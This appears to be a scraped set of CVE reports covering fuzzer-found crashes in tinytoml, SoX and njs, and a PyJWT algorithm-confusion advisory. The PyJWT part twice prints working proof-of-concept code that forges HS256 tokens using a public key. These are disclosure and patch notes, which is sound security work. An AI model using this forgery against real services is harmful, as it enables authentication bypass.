    fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) ()
    main () at /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20
    

the testcase I use is like parse\_file.cc in your project. you can just compile use your code and input my file to the parse\_file. stack size is 8192kbs. And you will get a segment fault caused by stack overflow. I have upload the file causes this.  
crashcase.zip

CVE-2021-42692: stack-overflow at  "parseFile"  · Issue #49 · mayah/tinytoml

In SoX 14.4.2, there is an assertion failure in rate_init in rate.c in libsox.a.

**summary**

Hello, I was testing my new fuzzer and found two bugs: a reachable assertion in rate\_init, rate.c:303 and a float point exception in lsx\_aiffstartwrite.

**environment**

sox latest commit 42b3557e13e0fe01a83465b672d89faddbe65f49,  
clang 12.0.1,  
Ubuntu 21.10

**step to reproduce**

compile sox with CC=clang, CFLAGS="-fsanitize=address -g"  
run command ./sox --single-threaded @@ -t aiff /dev/null

**BUG1**

sox:rate.c:303:voidrate_init(rate_t*,rate_shared_t*,double,double,double,double,double,rolloff_t,sox_bool,sox_bool,int,int,sox_bool):Assertion`factor>0'failed.
Aborted

**BUG2**

AddressSanitizer:DEADLYSIGNAL
=================================================================
==3050061==ERROR:AddressSanitizer:FPEonunknownaddress0x000000591211(pc0x000000591211bp0x7ffd7929b6b0sp0x7ffd7929b660T0)
#00x591211inlsx_aiffstartwrite(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x591211)
#10x83e26finopen_write(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x83e26f)
#20x83b303insox_open_write(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x83b303)
#30x8a4ae8inopen_output_file(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x8a4ae8)
#40x8952e1inprocess(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x8952e1)
#50x887e23inmain(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x887e23)
#60x7fac08e4afcfin__libc_start_call_main../sysdeps/nptl/libc_start_call_main.h:58
#70x7fac08e4b07cin__libc_start_main_impl../csu/libc-start.c:409
#80x408864in_start(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x408864)

AddressSanitizercannotprovideadditionalinfo.
SUMMARY:AddressSanitizer:FPE(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x591211)inlsx_aiffstartwrite
==3050061==ABORTING

**POC**

as shown in attachment poc.zip

**Credit**

NCNIPC of China  
Hexhive

CVE-2022-31651: SoX - Sound eXchange / Bugs

Nginx NJS v0.7.3 was discovered to contain a stack overflow in the function njs_default_module_loader at /src/njs/src/njs_module.c.

**Description**

njs 0.7.3, used in NGINX, was discovered to contain a stack-buffer-overflow in njs\_default\_module\_loader  
(/src/njs/src/njs\_module.c)

**ENV**

*   Version : 0.7.3
*   Commit : 222d6fd
*   OS : Ubuntu 18.04
*   Configure : CC=clang-14 ./configure --address-sanitizer=YES

**BT**

    root@826e0eaa5e54:/src/njs_0.7.3_debug# ./build/njs /njs/out/crash_stack-buffer-overflow_1 
    =================================================================
    ==22820==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe0b253e41 at pc 0x00000049e4ca bp 0x7ffe0b252e10 sp 0x7ffe0b2525d8
    WRITE of size 21313 at 0x7ffe0b253e41 thread T0
        #0 0x49e4c9 in __asan_memcpy /src/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
        #1 0x55db4a in njs_module_path /src/njs_0.7.3_debug/src/njs_module.c:148:18
        #2 0x55db4a in njs_module_lookup /src/njs_0.7.3_debug/src/njs_module.c:83:11
        #3 0x55db4a in njs_default_module_loader /src/njs_0.7.3_debug/src/njs_module.c:377:11
        #4 0x55d195 in njs_parser_module /src/njs_0.7.3_debug/src/njs_module.c:56:14
        #5 0x59a737 in njs_parser_import /src/njs_0.7.3_debug/src/njs_parser.c:7793:24
        #6 0x56ed11 in njs_parser /src/njs_0.7.3_debug/src/njs_parser.c:598:23
        #7 0x4e92cd in njs_vm_compile /src/njs_0.7.3_debug/src/njs_vm.c:159:11
        #8 0x4d7c66 in njs_process_script /src/njs_0.7.3_debug/src/njs_shell.c:886:11
        #9 0x4d72bb in njs_process_file /src/njs_0.7.3_debug/src/njs_shell.c:619:11
        #10 0x4d72bb in main /src/njs_0.7.3_debug/src/njs_shell.c:303:15
        #11 0x7f566fabf0b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
        #12 0x41ea3d in _start (/src/njs_0.7.3_debug/build/njs+0x41ea3d)
    
    Address 0x7ffe0b253e41 is located in stack of thread T0 at offset 4129 in frame
        #0 0x55d6af in njs_default_module_loader /src/njs_0.7.3_debug/src/njs_module.c:363
    
      This frame has 6 object(s):
        [32, 4129) 'src.i' (line 115)
        [4400, 4544) 'sb.i' (line 173) <== Memory access at offset 4129 partially underflows this variable
        [4608, 8705) 'src.i.i' (line 115) <== Memory access at offset 4129 partially underflows this variable
        [8976, 8992) 'cwd' (line 365) <== Memory access at offset 4129 partially underflows this variable
        [9008, 9024) 'text' (line 365) <== Memory access at offset 4129 partially underflows this variable
        [9040, 13184) 'info' (line 368) <== Memory access at offset 4129 partially underflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /src/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 in __asan_memcpy
    Shadow bytes around the buggy address:
      0x100041642770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100041642780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100041642790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000416427a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000416427b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x1000416427c0: 00 00 00 00 00 00 00 00[01]f2 f2 f2 f2 f2 f2 f2
      0x1000416427d0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x1000416427e0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8
      0x1000416427f0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2
      0x100041642800: f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
      0x100041642810: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==22820==ABORTING
    
    

**Fixed**

The issue was fixed in ab1702c.

FYI, the problem was committed in 2ff8b26 which was not released yet.

**Reference**

https://huntr.dev/bounties/a244d6e7-a5ec-47ef-9d77-8c50764ffc0a/

CVE-2022-29379: [Fixed] njs 0.7.3 was discovered to contain a stack-buffer-overflow bug in njs_default_module_loader · Issue #493 · nginx/njs

### Impact
_What kind of vulnerability is it? Who is impacted?_

Disclosed by Aapo Oksman (Senior Security Specialist, Nixu Corporation).

> PyJWT supports multiple different JWT signing algorithms. With JWT, an 
> attacker submitting the JWT token can choose the used signing algorithm.
> 
> The PyJWT library requires that the application chooses what algorithms 
> are supported. The application can specify 
> "jwt.algorithms.get_default_algorithms()" to get support for all 
> algorithms. They can also specify a single one of them (which is the 
> usual use case if calling jwt.decode directly. However, if calling 
> jwt.decode in a helper function, all algorithms might be enabled.)
> 
> For example, if the user chooses "none" algorithm and the JWT checker 
> supports that, there will be no signature checking. This is a common 
> security issue with some JWT implementations.
> 
> PyJWT combats this by requiring that the if the "none" algorithm is 
> used, the key has to be empty. As the key is given by the application 
> running the checker, attacker cannot force "none" cipher to be used.
> 
> Similarly with HMAC (symmetric) algorithm, PyJWT checks that the key is 
> not a public key meant for asymmetric algorithm i.e. HMAC cannot be used 
> if the key begins with "ssh-rsa". If HMAC is used with a public key, the 
> attacker can just use the publicly known public key to sign the token 
> and the checker would use the same key to verify.
> 
>  From PyJWT 2.0.0 onwards, PyJWT supports ed25519 asymmetric algorithm. 
> With ed25519, PyJWT supports public keys that start with "ssh-", for 
> example "ssh-ed25519".

```python
import jwt
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ed25519

# Generate ed25519 private key
private_key = ed25519.Ed25519PrivateKey.generate()

# Get private key bytes as they would be stored in a file
priv_key_bytes = 
private_key.private_bytes(encoding=serialization.Encoding.PEM,format=serialization.PrivateFormat.PKCS8, 
encryption_algorithm=serialization.NoEncryption())

# Get public key bytes as they would be stored in a file
pub_key_bytes = 
private_key.public_key().public_bytes(encoding=serialization.Encoding.OpenSSH,format=serialization.PublicFormat.OpenSSH)

# Making a good jwt token that should work by signing it with the 
private key
encoded_good = jwt.encode({"test": 1234}, priv_key_bytes, algorithm="EdDSA")

# Using HMAC with the public key to trick the receiver to think that the 
public key is a HMAC secret
encoded_bad = jwt.encode({"test": 1234}, pub_key_bytes, algorithm="HS256")

# Both of the jwt tokens are validated as valid
decoded_good = jwt.decode(encoded_good, pub_key_bytes, 
algorithms=jwt.algorithms.get_default_algorithms())
decoded_bad = jwt.decode(encoded_bad, pub_key_bytes, 
algorithms=jwt.algorithms.get_default_algorithms())

if decoded_good == decoded_bad:
     print("POC Successfull")

# Of course the receiver should specify ed25519 algorithm to be used if 
they specify ed25519 public key. However, if other algorithms are used, 
the POC does not work
# HMAC specifies illegal strings for the HMAC secret in jwt/algorithms.py
#
#        invalid_strings = [
#            b"-----BEGIN PUBLIC KEY-----",
#            b"-----BEGIN CERTIFICATE-----",
#            b"-----BEGIN RSA PUBLIC KEY-----",
#            b"ssh-rsa",
#        ]
#
# However, OKPAlgorithm (ed25519) accepts the following in 
jwt/algorithms.py:
#
#                if "-----BEGIN PUBLIC" in str_key:
#                    return load_pem_public_key(key)
#                if "-----BEGIN PRIVATE" in str_key:
#                    return load_pem_private_key(key, password=None)
#                if str_key[0:4] == "ssh-":
#                    return load_ssh_public_key(key)
#
# These should most likely made to match each other to prevent this behavior
```


```python
import jwt

#openssl ecparam -genkey -name prime256v1 -noout -out ec256-key-priv.pem
#openssl ec -in ec256-key-priv.pem -pubout > ec256-key-pub.pem
#ssh-keygen -y -f ec256-key-priv.pem > ec256-key-ssh.pub

priv_key_bytes = b"""-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIOWc7RbaNswMtNtc+n6WZDlUblMr2FBPo79fcGXsJlGQoAoGCCqGSM49
AwEHoUQDQgAElcy2RSSSgn2RA/xCGko79N+7FwoLZr3Z0ij/ENjow2XpUDwwKEKk
Ak3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
-----END EC PRIVATE KEY-----"""

pub_key_bytes = b"""-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAElcy2RSSSgn2RA/xCGko79N+7FwoL
Zr3Z0ij/ENjow2XpUDwwKEKkAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
-----END PUBLIC KEY-----"""

ssh_key_bytes = b"""ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXMtkUkkoJ9kQP8QhpKO/TfuxcKC2a92dIo/xDY6MNl6VA8MChCpAJN0w1wvVPJ4qTJRnGO7A6V6dl8oRxDPkc="""

# Making a good jwt token that should work by signing it with the private key
encoded_good = jwt.encode({"test": 1234}, priv_key_bytes, algorithm="ES256")

# Using HMAC with the ssh public key to trick the receiver to think that the public key is a HMAC secret
encoded_bad = jwt.encode({"test": 1234}, ssh_key_bytes, algorithm="HS256")

# Both of the jwt tokens are validated as valid
decoded_good = jwt.decode(encoded_good, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())
decoded_bad = jwt.decode(encoded_bad, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())

if decoded_good == decoded_bad:
    print("POC Successfull")
else:
    print("POC Failed")
```

> The issue is not that big as 
> algorithms=jwt.algorithms.get_default_algorithms() has to be used. 
> However, with quick googling, this seems to be used in some cases at 
> least in some minor projects.

### Patches

Users should upgrade to v2.4.0.

### Workarounds

Always be explicit with the algorithms that are accepted and expected when decoding.

### References
_Are there any links users can visit to find out more?_

### For more information
If you have any questions or comments about this advisory:
* Open an issue in https://github.com/jpadilla/pyjwt
* Email José Padilla: pyjwt at jpadilla dot com


**Impact**

_What kind of vulnerability is it? Who is impacted?_

Disclosed by Aapo Oksman (Senior Security Specialist, Nixu Corporation).

> PyJWT supports multiple different JWT signing algorithms. With JWT, an  
> attacker submitting the JWT token can choose the used signing algorithm.
> 
> The PyJWT library requires that the application chooses what algorithms  
> are supported. The application can specify  
> "jwt.algorithms.get\_default\_algorithms()" to get support for all  
> algorithms. They can also specify a single one of them (which is the  
> usual use case if calling jwt.decode directly. However, if calling  
> jwt.decode in a helper function, all algorithms might be enabled.)
> 
> For example, if the user chooses "none" algorithm and the JWT checker  
> supports that, there will be no signature checking. This is a common  
> security issue with some JWT implementations.
> 
> PyJWT combats this by requiring that the if the "none" algorithm is  
> used, the key has to be empty. As the key is given by the application  
> running the checker, attacker cannot force "none" cipher to be used.
> 
> Similarly with HMAC (symmetric) algorithm, PyJWT checks that the key is  
> not a public key meant for asymmetric algorithm i.e. HMAC cannot be used  
> if the key begins with "ssh-rsa". If HMAC is used with a public key, the  
> attacker can just use the publicly known public key to sign the token  
> and the checker would use the same key to verify.
> 
> From PyJWT 2.0.0 onwards, PyJWT supports ed25519 asymmetric algorithm.  
> With ed25519, PyJWT supports public keys that start with "ssh-", for  
> example "ssh-ed25519".

import jwt
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ed25519

\# Generate ed25519 private key
private\_key \= ed25519.Ed25519PrivateKey.generate()

\# Get private key bytes as they would be stored in a file
priv\_key\_bytes \= 
private\_key.private\_bytes(encoding\=serialization.Encoding.PEM,format\=serialization.PrivateFormat.PKCS8, 
encryption\_algorithm\=serialization.NoEncryption())

\# Get public key bytes as they would be stored in a file
pub\_key\_bytes \= 
private\_key.public\_key().public\_bytes(encoding\=serialization.Encoding.OpenSSH,format\=serialization.PublicFormat.OpenSSH)

\# Making a good jwt token that should work by signing it with the 
private key
encoded\_good \= jwt.encode({"test": 1234}, priv\_key\_bytes, algorithm\="EdDSA")

\# Using HMAC with the public key to trick the receiver to think that the 
public key is a HMAC secret
encoded\_bad \= jwt.encode({"test": 1234}, pub\_key\_bytes, algorithm\="HS256")

\# Both of the jwt tokens are validated as valid
decoded\_good \= jwt.decode(encoded\_good, pub\_key\_bytes, 
algorithms\=jwt.algorithms.get\_default\_algorithms())
decoded\_bad \= jwt.decode(encoded\_bad, pub\_key\_bytes, 
algorithms\=jwt.algorithms.get\_default\_algorithms())

if decoded\_good \== decoded\_bad:
     print("POC Successfull")

\# Of course the receiver should specify ed25519 algorithm to be used if 
they specify ed25519 public key. However, if other algorithms are used, 
the POC does not work
\# HMAC specifies illegal strings for the HMAC secret in jwt/algorithms.py
#
#        invalid\_strings = \[
#            b"-----BEGIN PUBLIC KEY-----",
#            b"-----BEGIN CERTIFICATE-----",
#            b"-----BEGIN RSA PUBLIC KEY-----",
#            b"ssh-rsa",
#        \]
#
\# However, OKPAlgorithm (ed25519) accepts the following in 
jwt/algorithms.py:
#
#                if "-----BEGIN PUBLIC" in str\_key:
#                    return load\_pem\_public\_key(key)
#                if "-----BEGIN PRIVATE" in str\_key:
#                    return load\_pem\_private\_key(key, password=None)
#                if str\_key\[0:4\] == "ssh-":
#                    return load\_ssh\_public\_key(key)
#
\# These should most likely made to match each other to prevent this behavior

import jwt

#openssl ecparam -genkey -name prime256v1 -noout -out ec256-key-priv.pem
#openssl ec -in ec256-key-priv.pem -pubout > ec256-key-pub.pem
#ssh-keygen -y -f ec256-key-priv.pem > ec256-key-ssh.pub

priv\_key\_bytes \= b"""-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIOWc7RbaNswMtNtc+n6WZDlUblMr2FBPo79fcGXsJlGQoAoGCCqGSM49
AwEHoUQDQgAElcy2RSSSgn2RA/xCGko79N+7FwoLZr3Z0ij/ENjow2XpUDwwKEKk
Ak3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
\-----END EC PRIVATE KEY-----"""

pub\_key\_bytes \= b"""-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAElcy2RSSSgn2RA/xCGko79N+7FwoL
Zr3Z0ij/ENjow2XpUDwwKEKkAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
\-----END PUBLIC KEY-----"""

ssh\_key\_bytes \= b"""ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXMtkUkkoJ9kQP8QhpKO/TfuxcKC2a92dIo/xDY6MNl6VA8MChCpAJN0w1wvVPJ4qTJRnGO7A6V6dl8oRxDPkc="""

\# Making a good jwt token that should work by signing it with the private key
encoded\_good \= jwt.encode({"test": 1234}, priv\_key\_bytes, algorithm\="ES256")

\# Using HMAC with the ssh public key to trick the receiver to think that the public key is a HMAC secret
encoded\_bad \= jwt.encode({"test": 1234}, ssh\_key\_bytes, algorithm\="HS256")

\# Both of the jwt tokens are validated as valid
decoded\_good \= jwt.decode(encoded\_good, ssh\_key\_bytes, algorithms\=jwt.algorithms.get\_default\_algorithms())
decoded\_bad \= jwt.decode(encoded\_bad, ssh\_key\_bytes, algorithms\=jwt.algorithms.get\_default\_algorithms())

if decoded\_good \== decoded\_bad:
    print("POC Successfull")
else:
    print("POC Failed")

> The issue is not that big as  
> algorithms=jwt.algorithms.get\_default\_algorithms() has to be used.  
> However, with quick googling, this seems to be used in some cases at  
> least in some minor projects.

**Patches**

Users should upgrade to v2.4.0.

**Workarounds**

Always be explicit with the algorithms that are accepted and expected when decoding.

**References**

_Are there any links users can visit to find out more?_

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in https://github.com/jpadilla/pyjwt
*   Email José Padilla: pyjwt at jpadilla dot com

**References**

*   GHSA-ffqj-6fqr-9h24
*   https://nvd.nist.gov/vuln/detail/CVE-2022-29217
*   jpadilla/pyjwt@9c52867
*   https://github.com/jpadilla/pyjwt/releases/tag/2.4.0

Tag

#c++